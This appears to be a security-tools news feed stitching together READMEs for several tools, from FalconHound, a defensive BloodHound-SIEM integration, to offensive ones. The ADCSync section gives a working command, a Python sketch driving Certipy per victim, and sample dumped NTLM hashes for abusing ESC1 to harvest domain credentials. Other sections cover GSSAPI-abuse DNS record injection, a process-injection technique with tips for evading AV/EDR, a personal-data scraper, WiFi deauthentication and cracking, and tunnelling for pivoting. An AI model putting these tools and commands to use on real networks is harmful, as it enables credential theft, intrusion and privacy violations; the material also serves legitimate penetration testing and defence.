One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

Some of the hardest relationships to gather for BloodHound are the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog post detailing why we developed it, along with some use-case examples, can be found here.


Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and/or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.

The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file, stored in the directory of the source of the information it queries. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self-explanatory, there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
    Enabled: true
    Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
    Enabled: true
    Query: |
      MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
    Parameters:
      Computer: Computer
      TargetUserSid: TargetUserSid
      Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is also why query output needs to be controlled; you might otherwise flood your target.

  - Name: Sentinel
    Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

  - Name: Watchlist
    Enabled: true
    WatchlistName: FH_MDE_Exploitable_Machines
    DisplayName: MDE Exploitable Machines
    SearchKey: DeviceName
    Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
    Enabled: true

Azure Data Explorer

Like Sentinel, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
    Enabled: true
    Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it has to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is converted into a relationship between the computer and the user. The relationship is called HadSession and has the following properties:

{
  "till": "2021-08-31T14:00:00Z",
  "source": "falconhound",
  "reason": "logoff"
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer:
  - 'exploitable': true/false
  - 'exploits': list of CVEs
  - 'exposed': true/false
  - 'ports': list of ports accessible from the internet
  - 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials is to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Keyvault. This role only allows reading the secrets, not even listing them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log-based queries are built to run every 15 minutes. Should processing take too long, you might need to tweak this a little; if that is the case, it might be best to disable certain actions.

Also, there might be some overlap with, for instance, the session actions. If you have a lot of sessions, you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have MDE and Sentinel connected and most machines onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R
19 January 2024 at 11:30


This is a tool I whipped together quickly to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
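
Conceptually, the loop reduces to shelling out to Certipy twice per user, roughly like the sketch below (not the tool's actual code; verify the Certipy flags against your installed version):

import subprocess

def dump_ntlm(victims, domain, operator, password, ca, template, target_ip, dc_ip):
    for victim in victims:
        # Request a certificate carrying the victim's UPN via the ESC1-vulnerable template
        subprocess.run(["certipy", "req", "-u", f"{operator}@{domain}", "-p", password,
                        "-ca", ca, "-target", target_ip, "-template", template,
                        "-upn", f"{victim}@{domain}", "-out", victim], check=False)
        # Authenticate with the resulting PFX to retrieve the victim's NT hash
        subprocess.run(["certipy", "auth", "-pfx", f"{victim}.pfx", "-dc-ip", dc_ip],
                       check=False)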

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

  1. Valid domain credentials
  2. A user list from a BloodHound dump that will be passed in.
  3. A template vulnerable to ESC1 (found with Certipy find)
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Usage: adcsync.py [OPTIONS]

Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.

TODO

  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables

Acknowledgements

  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing


Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R
20 January 2024 at 11:30


gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI-abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI-based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


Prerequisites

gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

Windows

On Windows hosts, the MIT Kerberos software should be installed in addition to the Python modules listed in requirements.txt; it can be obtained from the MIT Kerberos Distribution Page. On Windows, krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

Linux

The libkrb5-dev package needs to be installed prior to installing the Python requirements.

All

Once the requirements are satisfied, you can install the Python dependencies via pip/pip3:

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non-Windows machines has been obtained, gssapi-abuse will attempt to connect to each host over SSH and determine whether GSSAPI-based authentication is permitted.
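
The LDAP side of that search can be pictured with a short ldap3 sketch (hypothetical code, not the tool's own; the hostnames and credentials reuse the example below):

from ldap3 import Connection, NTLM, SUBTREE, Server

server = Server("dc1.ad.ginge.com")  # hypothetical domain controller
conn = Connection(server, user="AD\\john.doe", password="SuperSecret!",
                  authentication=NTLM, auto_bind=True)
# Computers whose operatingSystem attribute does not contain the word Windows
conn.search("DC=ad,DC=ginge,DC=com",
            "(&(objectCategory=computer)(!(operatingSystem=*Windows*)))",
            search_scope=SUBTREE, attributes=["dNSHostName", "operatingSystem"])
for entry in conn.entries:
    print(entry.dNSHostName, entry.operatingSystem)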

Example

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently, dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.

Examples

Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a '.'; this is important, otherwise the record becomes relative to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones than A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50


DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R
21 January 2024 at 11:30

DllNotificationInjection is a POC of a new “threadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:

https://shorsec.io/blog/dll-notification-injection/


How It Works?

DllNotificationInjection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching the List.Flink of the list head and the List.Blink of the first (now second) entry of the list.

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process, we just need to wait for the remote process to trigger our DLL notification callback by loading or unloading some DLL. This obviously doesn't happen regularly in every process, so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates, although I encourage you to find others as well.

OPSEC Notes

This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.

Acknowledgments



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R
22 January 2024 at 11:30


Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
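
At its simplest, the regular-expression side of this reduces to a few lines; a stripped-down sketch (illustrative only, far cruder than Uscrapper's own patterns):

import re

import requests

# Naive email pattern for illustration; real-world patterns need to be stricter
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def scrape_emails(url):
    # Fetch the page and pull anything shaped like an email address
    html = requests.get(url, timeout=10, headers={"User-Agent": "Mozilla/5.0"}).text
    return sorted(set(EMAIL_RE.findall(html)))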


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers, and usernames.

What's New?

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-web-scraping techniques.
  • Introduced Crawl and Scrape: an advanced crawl-and-scrape module to scrape websites from within.
  • Implemented multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R
23 January 2024 at 11:30


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them in parallel if the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/rayder@latest

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
VAR_NAME: value
# Add more variables...

parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
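The substitution behaviour amounts to a simple template render where command-line values win over defaults; in Python terms, something like this (a sketch of the semantics, not Rayder's Go implementation):

import re

def render(command, defaults, overrides):
    # Values supplied on the command line override the vars section defaults
    values = {**defaults, **overrides}
    return re.sub(r"\{\{(\w+)\}\}", lambda m: str(values[m.group(1)]), command)

# render('echo "Output directory {{OUTPUT_DIR}}"', {"OUTPUT_DIR": "results"}, {})
# -> 'echo "Output directory results"'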

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
ORG: "example.org"
OUTPUT_DIR: "results"

modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

Inspiration for this project comes from the awesome Taskfile project.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R
24 January 2024 at 11:30


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on Linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under the MIT license.

Contributing

If you have any questions about the usage of the application, do not hesitate to open a discussion.

If you want to report a bug or propose a feature, do not hesitate to open an issue or submit a pull request.



Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R
25 January 2024 at 11:30


AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys.
  • Create a file named .openai-key and paste your ChatGPT API key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
  • Create a file named domains.txt and type in a line-separated list of domains you'd like to scan.
  • (Optional) Create a file named blacklist.txt and type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
  • Run AntiSquat using python3.8 antisquat.py domains.txt (a consolidated sketch of these steps follows below).
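
Taken together, a minimal setup might look like this (assuming the default clone directory; the API key value is a placeholder):

git clone https://github.com/redhuntlabs/antisquat
cd antisquat
pip install -r requirements.txt
echo "YOUR_CHATGPT_API_KEY" > .openai-key
echo "flipkart.com" > domains.txt
python3.8 antisquat.py domains.txt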

Examples:

Let's say you'd like to run AntiSquat on flipkart.com.

Create a file named domains.txt, then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one by one, and tries to extract contact information from each page.

Test case:

A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured this way, and any contact information on the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.

Acknowledgements

To know more about our Attack Surface Management platform, check out NVADR.



Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R
26 January 2024 at 11:30


Ligolo-ng is a simple, lightweight, and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
